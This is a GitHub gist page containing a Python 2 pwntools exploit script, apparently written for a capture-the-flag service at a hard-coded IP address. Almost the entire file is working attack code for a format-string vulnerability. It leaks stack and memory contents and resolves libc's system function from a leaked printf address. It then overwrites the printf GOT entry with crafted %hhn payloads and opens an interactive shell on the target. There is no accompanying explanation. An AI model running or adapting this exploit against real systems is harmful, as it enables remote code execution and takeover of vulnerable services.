Created
December 29, 2016 21:59
-
-
Save CreateRemoteThread/a214d67b99aa46882ae419f79aea11b7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import binascii | |
import pwn | |
import sys | |
import struct | |
RHOST = "78.46.224.86" | |
RPORT = 1337 | |
saveSocket = None | |
def leakStringAt(s,address): | |
data = "%7$pBBBB" + pwn.p64(address) | |
if "\n" in data: | |
print " [!] newline in payload!" | |
return "" | |
try: | |
s.sendline("%7$sAAAA" + pwn.p64(address)) | |
except EOFError: | |
raise EOFError | |
try: | |
data = p.recv() | |
print " [R] leaked %d bytes at %x" % (len(data.split("AAAA")[0]),address) | |
except EOFError: | |
print " [X] EOFError trying to leak from %x" % address | |
return None | |
(code,fuck) = data.split("AAAA") | |
return code | |
def leakFour(address): | |
global saveSocket | |
try: | |
data = leakBlock(saveSocket,address,4)[0:4] | |
print binascii.hexlify(data) | |
return str(data) | |
except: | |
return '' | |
def leakStack(s,start,end): | |
out = "" | |
for i in range(start,end): | |
out += "%%%d$p" % i | |
s.sendline(out) | |
print s.recv() | |
def leakStackPivot(s): | |
for i in range(1,1000): | |
s.sendline("AAAA%4n%" + str(i) + "$p") | |
data = p.recv() | |
if "0004" in data: | |
print " [!] MAYBE FOUND! offset %d : %s" % (i,data) | |
else: | |
print " [+] offset %d : %s" % (i,data) | |
def leakBlock(s,address,size): | |
remainingSize = size | |
out = bytearray("") | |
while remainingSize > 0: | |
try: | |
data = leakStringAt(s,address + size - remainingSize) | |
except EOFError: | |
return out | |
if data == None: | |
remainingSize -= 1 | |
else: | |
out += bytearray(data) | |
remainingSize -= len(data) + 1 | |
out += bytearray("\x00") | |
return out | |
def send_payload(payload): | |
print repr("AAAA"+payload) | |
saveSocket.sendline("AAAA" + payload) | |
data = saveSocket.recv() | |
print repr(data) | |
return data | |
def leakSystem(s): | |
d = pwn.DynELF(leakFour,0x400400) | |
system_addr = d.lookup('system','libc') | |
print "SYSTEM at 0x%x" % system_addr | |
return system_addr | |
def pad255(string): | |
return string + "A" * (256 - len(string)) | |
def convertToMagic(address): | |
data = struct.pack("<q",address) | |
totalDataWritten = 0 | |
out = "" | |
for i in range(0,len(data)): | |
newvalue = ord(data[i]) | |
if newvalue < totalDataWritten: | |
newvalue = 256 - totalDataWritten + newvalue | |
out += "%" + str(newvalue) + "c" + "%" + str(38 + i) + "$hhn" | |
totalDataWritten = 0 | |
elif newvalue == 0: | |
pass | |
elif newvalue == totalDataWritten: | |
out += "%" + str(38 + i) + "$hhn" | |
newvalue = 0 | |
else: | |
out += "%" + str(newvalue - totalDataWritten) + "c" + "%" + str(38 + i) + "$hhn" | |
totalDataWritten += newvalue | |
totalDataWritten %= 256 | |
print out | |
return out | |
if __name__ == "__main__": | |
if len(sys.argv) == 4 and sys.argv[1] == "leakstack": | |
p = pwn.remote(RHOST,RPORT) | |
leakStack(p,int(sys.argv[2],0),int(sys.argv[3],0)) | |
p.close() | |
sys.exit(0) | |
elif len(sys.argv) == 2 and sys.argv[1] == "pivot": | |
p = pwn.remote(RHOST,RPORT) | |
leakStackPivot(p) | |
p.close() | |
sys.exit(0) | |
elif len(sys.argv) == 2 and sys.argv[1] == "dynelf": | |
p = pwn.remote(RHOST,RPORT) | |
saveSocket = p | |
data = leakBlock(p,0x00601018,8) | |
d = leakSystem(p) | |
print "PRINTF at : " + binascii.hexlify(data) | |
# PRINTF ACTUAL: 7f44671dd550 | |
# SYSTEM ACTUAL: 7f44671cc6d0 | |
# DIFF: 10e80 | |
p.close() | |
sys.exit(0) | |
elif len(sys.argv) == 2 and sys.argv[1] == "exploit": # this is the right way to do it | |
p = pwn.remote(RHOST,RPORT) | |
data = leakBlock(p,0x601018,8) | |
printf_addr = struct.unpack("<q",data) | |
print " PRINTF AT 0x%x" % printf_addr | |
system_addr = printf_addr[0] - 0x10e80 | |
print " SYSTEM AT 0x%x" % system_addr | |
print " [!!!] stage 1 complete. try to write 0x%x to 0x601018" % system_addr | |
pwn.context.clear(arch='amd64') | |
saveSocket = p | |
f = pwn.FmtStr(execute_fmt=send_payload,offset=7) | |
fmt_payload = pwn.fmtstr_payload(38, {0x601018: system_addr}) | |
fmt_new = "%".join(fmt_payload.split("%")[1:]) | |
print " [!] autogen payload = " + fmt_new | |
# f.write(0x601018,system_addr) | |
# f.execute_writes() | |
GOT_ADDR_BLOCK = "\x18\x10\x60\x00\x00\x00\x00\x00\x19\x10\x60\x00\x00\x00\x00\x00\x1a\x10\x60\x00\x00\x00\x00\x00\x1b\x10\x60\x00\x00\x00\x00\x00\x1c\x10\x60\x00\x00\x00\x00\x00\x1d\x10\x60\x00\x00\x00\x00\x00\x1e\x10\x60\x00\x00\x00\x00\x00\x1f\x10\x60\x00\x00\x00\x00\x00" | |
PAYLOAD_BLOCK = convertToMagic(system_addr) | |
payload_firsttoken = [PAYLOAD_BLOCK.split("c")[0]] | |
autogen_tokens = fmt_new.split("c")[1:] | |
newmagic = "c".join(payload_firsttoken + autogen_tokens) | |
print newmagic | |
print " [!!!] sending magic\n" | |
p.sendline(pad255(newmagic) + GOT_ADDR_BLOCK) | |
print p.recv() | |
p.interactive() | |
p.close() | |
sys.exit(0) | |
elif len(sys.argv) == 4 and sys.argv[1] == "leak": | |
address = int(sys.argv[2],0) | |
size = int(sys.argv[3],0) | |
p = pwn.remote(RHOST,RPORT) | |
data = leakBlock(p,address,size) | |
f = open("%08x.elf" % address,"wb") | |
f.write(data) | |
f.close() | |
# print binascii.hexlify(data) | |
print pwn.disasm(data,arch='amd64',vma=address) | |
p.close() | |
sys.exit(0) | |
else: | |
print "what do you want?>" | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment